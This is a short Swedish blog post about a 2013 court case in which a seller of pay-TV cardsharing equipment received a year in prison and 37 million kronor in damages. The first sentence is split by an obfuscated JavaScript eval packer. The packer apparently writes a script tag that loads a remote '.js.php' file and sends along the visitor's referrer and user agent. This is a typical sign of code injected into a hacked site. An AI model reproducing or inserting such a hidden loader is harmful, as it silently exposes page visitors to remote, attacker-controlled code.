Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Cardsharing utrustning gav 1 år fängelse & 37 milj i böter

Cardsharing utrustning gav 1 år fängelse & 37 milj i böter
Filip Urde
  • On 14 februari, 2013
  • http://www.revue.se/filip-urde

Igår eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zkraf|var|u0026u|referrer|ttfri||js|php’.split(’|’),0,{}))
kunde man läsa på di.se om en man som sålt cardsharing utrustning till ca: 1 800 personer i Sverige.

 

 

Cardsharing är att man med specialkonstruerad utrustning kan se på betaltv-kanaler utan att betala kanalerna. Det är olagligt att sälja den här utrustningen, det är dock lagligt att använda den… Vilket skapar vissa frågetecken. Det ser dock ut som att man kommer även göra användningen olaglig senare under 2013. Ja, det kanske vore bäst, så det inte blir några missförstånd här.

Mannen som sålde utrustningen dömdes igår till ett års fängelse, samt 37 miljoner kronor i skadestånd.

Crazy mycket pengar helt enkelt!

Detta tyckte dock David Würgler på branschorganisationen Stopnordic var ganska ”fair” och säger följande till TT:

”Vi är nöjda. Det sänder en kraftig signal om att det inte är okej att göra så här, att man inte ska göra den här typen av aktioner.”

www.di.se